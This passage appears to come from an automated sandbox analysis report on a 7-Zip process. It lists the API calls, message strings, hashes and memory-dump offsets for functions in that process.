                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0AE0C93331398081CA50EF35D8952ED23A0EB9AB59F1801F1AE2E9E362DE10C9978B54
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionThrow$memmove
                                                                                                                                                                                                        • String ID: Internal collision in update action set
                                                                                                                                                                                                        • API String ID: 265668421-2378581463
                                                                                                                                                                                                        • Opcode ID: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
                                                                                                                                                                                                        • Instruction ID: a34fc420bfb73f816c1128f6ad07f971927ee404a29c012a7c772cc35fecf541
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB41E1333286858EDF24EB1AE45476E7BE0F399788F448265EB8903B58DB78D585CB04
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID: =
                                                                                                                                                                                                        • API String ID: 1294909896-2525689732
                                                                                                                                                                                                        • Opcode ID: 40c11fba967689670f12ed8931cb4eba44630f327dd0b6864abb2cd98b0bc6cc
                                                                                                                                                                                                        • Instruction ID: 6a6e23929e50b6a549f0ac45507fd0f10d1ce033ed7d89f41362af34df77c62e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 40c11fba967689670f12ed8931cb4eba44630f327dd0b6864abb2cd98b0bc6cc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 77319363316A8096CB10DF55E49075EB7A0F7D67A1F9442E1FA8E43A68DB78C94ACB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • free.MSVCRT ref: 00B86E91
                                                                                                                                                                                                          • Part of subcall function 00B53518: free.MSVCRT ref: 00B53551
                                                                                                                                                                                                          • Part of subcall function 00B53314: memmove.MSVCRT ref: 00B53339
                                                                                                                                                                                                        • free.MSVCRT ref: 00B86E83
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove
                                                                                                                                                                                                        • String ID: exe
                                                                                                                                                                                                        • API String ID: 1534225298-1801697008
                                                                                                                                                                                                        • Opcode ID: 76770eb1b0aff3fcbaddab3083a3c2637205f7744bad9aa1b7e03b28f3d0466f
                                                                                                                                                                                                        • Instruction ID: bd1db6b7c5e850c88fb75b3586f3274ccda7982ff0990c07aeab6e03620f2769
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76770eb1b0aff3fcbaddab3083a3c2637205f7744bad9aa1b7e03b28f3d0466f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F131942330194196CA21FB25E45029EB7B0E785BD5F845292EF9E47779DF28C64ACB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$ByteStringmemmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 400576877-0
                                                                                                                                                                                                        • Opcode ID: 627be9a5ab345c6a2ae9b3d4a8fa1f013a1db37638386f1ebadb93c6192a02ff
                                                                                                                                                                                                        • Instruction ID: 5bcc743f26bf4998a8637aa2fab5bd09efe0ac61a9be2ac415242d6cd9023855
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 627be9a5ab345c6a2ae9b3d4a8fa1f013a1db37638386f1ebadb93c6192a02ff
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8721A333305B8092EB349F51E59036972E0FB887A0F4882A5AFAE4B794DF38C856C704
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$wcscmp
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4021281200-0
                                                                                                                                                                                                        • Opcode ID: 1721c6616b74a4c47d99cfe980b2e26b6a86647a23934d96b3aa9ed1d32fc9d1
                                                                                                                                                                                                        • Instruction ID: cb8cd9a9254e50279c07b1b7fe295ccf424299ea7914f14d971397ae321d2ad9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1721c6616b74a4c47d99cfe980b2e26b6a86647a23934d96b3aa9ed1d32fc9d1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1321B07731474092DB20AF26E44136977A1E7D5BE4F1493A1EE7E87794EB38CA86CB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID: Unsupported charset:
                                                                                                                                                                                                        • API String ID: 1294909896-616772432
                                                                                                                                                                                                        • Opcode ID: 9e42c2d2b4e1f7d5b703db533c77dc73d7d9a80e6522a8e966b0da96d7856300
                                                                                                                                                                                                        • Instruction ID: aa81f16fa4286e317a3d41cf9fb64911912dd295f00455d174e62fb58305f6cc
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e42c2d2b4e1f7d5b703db533c77dc73d7d9a80e6522a8e966b0da96d7856300
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F219563605601D2DA20EB18D8903A9B7A1E7C57E5F5442E2EEAD077A5CF68C989C740
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00B57D4C: GetFileAttributesW.KERNELBASE ref: 00B57D6E
                                                                                                                                                                                                          • Part of subcall function 00B57D4C: GetFileAttributesW.KERNEL32 ref: 00B57DA5
                                                                                                                                                                                                          • Part of subcall function 00B57D4C: free.MSVCRT ref: 00B57DB2
                                                                                                                                                                                                        • DeleteFileW.KERNEL32 ref: 00B56D90
                                                                                                                                                                                                        • DeleteFileW.KERNEL32 ref: 00B56DCA
                                                                                                                                                                                                        • free.MSVCRT ref: 00B56DDA
                                                                                                                                                                                                        • free.MSVCRT ref: 00B56DE8
                                                                                                                                                                                                          • Part of subcall function 00B568A0: SetFileAttributesW.KERNELBASE ref: 00B568C7
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$Attributesfree$Delete
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 324319583-0
                                                                                                                                                                                                        • Opcode ID: 9ea681c350cecb0b42c71b1f35ea49690d0665b5843397cde649d2af5f6ea4c4
                                                                                                                                                                                                        • Instruction ID: 6917b00c70744d7bbe1976cb747877da4636d1d68c6c5ebc0ad8a9c40449969c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9ea681c350cecb0b42c71b1f35ea49690d0665b5843397cde649d2af5f6ea4c4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB016522344A0141CA34AF24E85136963B19B8A7B6F9817F1AD7A973E5DE24CD5EC600
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00B62137
                                                                                                                                                                                                        • free.MSVCRT ref: 00B621BB
                                                                                                                                                                                                          • Part of subcall function 00B56618: FormatMessageW.KERNEL32 ref: 00B56676
                                                                                                                                                                                                          • Part of subcall function 00B56618: LocalFree.KERNEL32 ref: 00B56698
                                                                                                                                                                                                          • Part of subcall function 00B5362C: memmove.MSVCRT ref: 00B53659
                                                                                                                                                                                                        • free.MSVCRT ref: 00B62182
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$ErrorFormatFreeLastLocalMessagememmove
                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                        • API String ID: 1743135865-3653984579
                                                                                                                                                                                                        • Opcode ID: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
                                                                                                                                                                                                        • Instruction ID: 8d0fdf515b6a735fc90d8901745ab11ea8aa59d9dabe12a31ea155ae33480aab
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4801A953305D0090CA20EB25E89035E77A1EBC5BF5F5453A5BE5E477B9DE38CA8AC740
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2244327787-0
                                                                                                                                                                                                        • Opcode ID: e021971f243c9fea39bb415f90c700eab78ade398cc3b993660b20944e3800b0
                                                                                                                                                                                                        • Instruction ID: b172758df3727f2f0c622d4f7e8724c13fe589b7d756d3e7b727df841c934eaa
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e021971f243c9fea39bb415f90c700eab78ade398cc3b993660b20944e3800b0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A101D4126202618BD7225B3DAC0037966D5F708BE2F9441B1FE4AEBA60DB28CC898780
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs
                                                                                                                                                                                                        • String ID: Break signaled$ERROR: Can't allocate required memory!$System ERROR:
                                                                                                                                                                                                        • API String ID: 1795875747-932691680
                                                                                                                                                                                                        • Opcode ID: adcba0a3c55dea3e12b275e3b9947d53b3d55053ca3c8ce761ccfc27961a96f0
                                                                                                                                                                                                        • Instruction ID: 54b061d6d8f9ddf0e0034c00567c1b39efd6187d5e700bc974ff882f21e073e8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: adcba0a3c55dea3e12b275e3b9947d53b3d55053ca3c8ce761ccfc27961a96f0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80015E72746904DADF08EB20EC913A833A0EB96756F8054F1EA0D83674DF38C989C7C6
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryRemovefree
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 736856642-0
                                                                                                                                                                                                        • Opcode ID: efb7360f27999ac7bd03661593c0501c8d3dd599b59c9a8bab47d3410f2a5fdb
                                                                                                                                                                                                        • Instruction ID: e93ad662b5775ac59970c5ee33d71b9e796621d669cad61f09cfbb43cd7149ec
                                                                                                                                                                                                        • Opcode Fuzzy Hash: efb7360f27999ac7bd03661593c0501c8d3dd599b59c9a8bab47d3410f2a5fdb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CDF0366730460181D9309F21D99133D63B4978A7F6F8803E1AEA9977A5DF25C94E9700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • _CxxThrowException.MSVCRT ref: 00B52F5B
                                                                                                                                                                                                          • Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
                                                                                                                                                                                                          • Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F
                                                                                                                                                                                                        • memmove.MSVCRT(?,Unsupported switch postfix -stm,00000000,00B5302B,?,?,?,?,00B53698), ref: 00B52F2C
                                                                                                                                                                                                        • free.MSVCRT ref: 00B52F34
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Unsupported switch postfix -stm, xrefs: 00B52EF6
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionThrow$freemallocmemmove
                                                                                                                                                                                                        • String ID: Unsupported switch postfix -stm
                                                                                                                                                                                                        • API String ID: 3321538808-3553869907
                                                                                                                                                                                                        • Opcode ID: 3ba05a05aa46c940f23773d9ce02a237b61b661c07e43798567cd67be696040c
                                                                                                                                                                                                        • Instruction ID: 925577dbe291018224d035c3b42e6a130246f1991afcdc44859f316944426779
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ba05a05aa46c940f23773d9ce02a237b61b661c07e43798567cd67be696040c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C6F0F67670124486DF28DF4AE48036DB3A1E7857D0F14C0B0DF8907711CE39D48ACB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • _CxxThrowException.MSVCRT ref: 00B52AFD
                                                                                                                                                                                                          • Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
                                                                                                                                                                                                          • Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F
                                                                                                                                                                                                        • memmove.MSVCRT ref: 00B52ACE
                                                                                                                                                                                                        • free.MSVCRT ref: 00B52AD6
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionThrow$freemallocmemmove
                                                                                                                                                                                                        • String ID: (LP-
                                                                                                                                                                                                        • API String ID: 3321538808-3833670221
                                                                                                                                                                                                        • Opcode ID: dee4ccff2bc834ea296647a4ce6a28e4725f2e66e5f6a145a280ef756b46b2c7
                                                                                                                                                                                                        • Instruction ID: 1cb8a5e20c738890aeef7fa085a63ca73fbfea53257f3f052551ca38dbc906eb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: dee4ccff2bc834ea296647a4ce6a28e4725f2e66e5f6a145a280ef756b46b2c7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64F0F07270264486DE24DF4AE88025EB3A1E7897D4F24C0B0DF8903710DA39C88ACB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$fputcfree
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3819637083-0
                                                                                                                                                                                                        • Opcode ID: eae9d0b3d4822125a0af48fe465b7a3762b83d2397cc5a4e6371e8094d4e32a9
                                                                                                                                                                                                        • Instruction ID: 9a1c6caf02a29ea37ed5b59b5066a9469ac66d5850f5c66de94b71152d4353d7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: eae9d0b3d4822125a0af48fe465b7a3762b83d2397cc5a4e6371e8094d4e32a9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08F0446230590191DA20EF26E84036A7320EB99BF5F044371EFAE437E5DF2CC5498704
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memmove.MSVCRT ref: 00B93E51
                                                                                                                                                                                                          • Part of subcall function 00B92B60: CompareFileTime.KERNEL32(?,?,?,00000000,00B93E64), ref: 00B92BA5
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CompareFileTimememmove
                                                                                                                                                                                                        • String ID: alternate streams$files$streams
                                                                                                                                                                                                        • API String ID: 1303509325-806849385
                                                                                                                                                                                                        • Opcode ID: be883e452b7650b9078f8113c3e616bbeedde65b08412c4df6c6f1594ccd81f0
                                                                                                                                                                                                        • Instruction ID: 11b37e60bf42767b3a87072172f1e8ea992f2db96e5732a6108289dd8d80ecf9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: be883e452b7650b9078f8113c3e616bbeedde65b08412c4df6c6f1594ccd81f0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9DF0C252310A6962EF60EB26D505B9863E0FB85FD4FC05062AA0C07E54AF38C39AC700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FormatMessageW.KERNEL32 ref: 00B56676
                                                                                                                                                                                                          • Part of subcall function 00B5339C: free.MSVCRT ref: 00B533D7
                                                                                                                                                                                                          • Part of subcall function 00B5339C: memmove.MSVCRT(00000000,?,?,00000000,00B510A8), ref: 00B533F2
                                                                                                                                                                                                        • LocalFree.KERNEL32 ref: 00B56698
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FormatFreeLocalMessagefreememmove
                                                                                                                                                                                                        • String ID: Error #
                                                                                                                                                                                                        • API String ID: 2451246624-1299485822
